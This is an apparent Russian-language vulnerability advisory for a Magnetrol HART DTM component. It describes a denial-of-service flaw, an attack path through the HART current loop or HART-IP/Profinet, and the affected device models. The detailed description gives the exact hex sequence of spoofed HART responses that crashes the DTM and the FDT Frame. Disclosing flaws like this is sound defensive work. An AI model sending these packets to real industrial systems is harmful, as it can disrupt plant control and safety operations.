ICSA-15-027-01

Вендор

Magnetrol

Продукт

Magnetrol HART DTM Component DDCHMAGH__000Lib

Тип уязвимости

Отказ в обслуживании

Reported

11.12.2014

Date of Public Advisory

29.01.2015

Автор

Александр Большев

Детальное описание

Следующая цепочка команд в ответе компоненту выведет из строя как сам DTM-компонент, так и приложение FDT Frame:

Received: command_id = 0
Sending to component: FE56E509060119080110F01C0702620000
Received: command_id = 50
Sending to component: 040000000A
Received: command_id = 13
Sending to component: 05A9E273E8E6105EC90E33343032383233363639323039333834363334363334363333373436303 734333137363832313131343536130A
Received: D2 command_id = 50
Sending to component: 040000000A

Появляется отладочное уведомление с текстом ""Run-time error"", затем DTM-компонент перестает работать. Кроме того, приложение FDT Frame не может корректно обработать такую ситуацию и нуждается в перезапуске.

Attack vector
Пусть HART DTM-компонент DDCHMAGH__000Lib используется для конфигурации любого HART-передатчика из списка ниже. Если злоумышленнику удастся с помощью HART-модема (или аналогичного устройства) подключиться к линии токовой петли HART, он сможет подменить ответ на управляющие HART-запросы 0, 50 и 13 на специально сконструированный ответ (в поле команд HART-пакета) и вывести из строя DTM-компонент вместе с FDT Frame. Злоумышленник также может изменить HART-пакет в любой точке FDT/DTM-инфраструктуры АСУ ТП, например внутри HART-IP, Profinet или другого протокола.

References
Уязвимые полевые устройства (устройства, поддерживаемые компонентом):

Model R82 R2
Model TA2 2x
Model R82
Model 355
Model 705 3x 2
Model 705 3x R2
E3 Modulevel
Model 705 3x
Model RX5
Enhanced Jupiter
Model 705 2x
ES II Modulevel V2